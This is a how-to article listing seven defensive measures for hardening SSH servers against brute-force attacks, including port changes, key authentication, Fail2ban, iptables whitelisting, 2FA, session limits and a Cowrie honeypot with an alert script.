7 Proven Ways to Harden SSH and Block Brute‑Force Attacks

As an experienced operations engineer, I have witnessed countless SSH brute‑force attacks that compromise poorly configured servers. Below are seven battle‑tested methods to secure SSH and eliminate brute‑force threats.

Current Threat Landscape

Each publicly exposed server receives 2000+ SSH login attempts per day.

90% of attacks target the default port 22.

Servers with weak passwords are compromised within 30 minutes .

Real‑world case: A compromised e‑commerce server led to a data leak of 100,000 users and losses exceeding $5 million.

Method 1: Change the Default SSH Port

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐

Most automated tools scan only port 22, so moving SSH to a non‑standard port blocks over 95% of brute‑force attempts.

# Edit SSH configuration
sudo vim /etc/ssh/sshd_config

# Change port (choose 1024‑65535)
Port 2022

# Restart SSH service
sudo systemctl restart sshd

Tip: Avoid ports used by common services (e.g., 80, 443, 3306); a four‑digit port is recommended.

Method 2: Disable Password Login and Enable Key Authentication

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐⭐

Public‑key authentication provides far stronger security than passwords.

Generate SSH Key Pair

# Generate key pair on client
ssh-keygen -t rsa -b 4096 -C "[email protected]"

# Copy public key to server (using the new port)
ssh-copy-id -p 2022 user@server_ip

Configure Server to Disable Passwords

# Edit SSH configuration
sudo vim /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

# Restart service
sudo systemctl restart sshd

Security improves from 10⁸ possible passwords to 2²⁰⁴⁸ RSA key combinations, making brute‑force practically impossible.

Method 3: Deploy Fail2ban for Dynamic Protection

Risk level: ⭐⭐⭐⭐ Difficulty: ⭐⭐⭐

Fail2ban monitors logs and automatically bans IPs that exceed failed‑login thresholds.

Install Fail2ban

# Ubuntu/Debian
sudo apt install fail2ban

# CentOS/RHEL
sudo yum install fail2ban

Create SSH Jail Configuration

# Create custom config
sudo vim /etc/fail2ban/jail.local

[sshd]
enabled = true
port = 2022
filter = sshd
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600

After configuration, any IP with three failed attempts within ten minutes is blocked for one hour.

Method 4: Set Up SSH Login Whitelist

Risk level: ⭐⭐⭐ Difficulty: ⭐⭐

Restrict SSH access to trusted IP ranges using iptables or cloud security groups.

iptables Example

# Flush existing rules (use with caution)
sudo iptables -F

# Allow loopback
sudo iptables -A INPUT -i lo -j ACCEPT

# Allow established connections
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow specific IP range to new SSH port
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 2022 -j ACCEPT

# Drop other SSH traffic
sudo iptables -A INPUT -p tcp --dport 2022 -j DROP

# Save rules
sudo iptables-save > /etc/iptables/rules.v4

Best for fixed office networks or VPN‑based access.

Method 5: Enable Two‑Factor Authentication (2FA)

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐⭐⭐⭐

Even if a private key is compromised, 2FA adds an extra verification layer.

Install Google Authenticator

# Ubuntu/Debian
sudo apt install libpam-google-authenticator

# CentOS/RHEL
sudo yum install google-authenticator

Configure 2FA for SSH

# Run configuration wizard
google-authenticator

# Edit PAM configuration
sudo vim /etc/pam.d/sshd

# Add line
auth required pam_google_authenticator.so

Update sshd_config

sudo vim /etc/ssh/sshd_config

# Enable challenge‑response authentication
ChallengeResponseAuthentication yes
AuthenticationMethods publickey,keyboard-interactive

Users must now provide a 6‑digit code from a mobile app during login.

Method 6: Limit SSH Connections

Risk level: ⭐⭐⭐ Difficulty: ⭐⭐

Restrict the number of concurrent sessions and set timeouts to reduce attack success rates.

sudo vim /etc/ssh/sshd_config

# Limit sessions
MaxSessions 3
MaxStartups 3:30:10

# Set timeouts
ClientAliveInterval 300
ClientAliveCountMax 2
LoginGraceTime 30

# Restrict users
AllowUsers admin operator
DenyUsers root guest

# Restart service
sudo systemctl restart sshd

Parameter explanations: MaxSessions: maximum sessions per connection. MaxStartups: max unauthenticated concurrent connections. ClientAliveInterval: server heartbeat interval. LoginGraceTime: maximum time allowed for login.

Method 7: Deploy an SSH Honeypot (Cowrie)

Risk level: ⭐⭐ Difficulty: ⭐⭐⭐⭐

A honeypot captures attacker behavior for analysis.

Install Cowrie

# Clone repository
git clone https://github.com/cowrie/cowrie.git
cd cowrie

# Install dependencies
pip install -r requirements.txt

# Configure honeypot
cp etc/cowrie.cfg.dist etc/cowrie.cfg
vim etc/cowrie.cfg

# Example SSH listen configuration
[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0

Real‑time Monitoring Script (optional)

#!/bin/bash
# Monitor auth.log for failed attempts
tail -f /var/log/auth.log | while read line; do
  if echo "$line" | grep -q "Failed password"; then
    ip=$(echo "$line" | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
    echo "$(date): Brute‑force attempt from $ip" >> /var/log/ssh_attacks.log
    # Optional alert webhook
    curl -X POST "https://your-webhook-url" -d "{'text': 'SSH attack from $ip'}"
  fi
done

Deploying a honeypot provides visibility into attack techniques and helps improve overall defenses.

Final Recommendations

Implement the methods in order of difficulty: start with changing the port, enable key authentication, deploy Fail2ban, configure IP whitelisting, set connection limits, add 2FA, and finally consider a honeypot for advanced monitoring.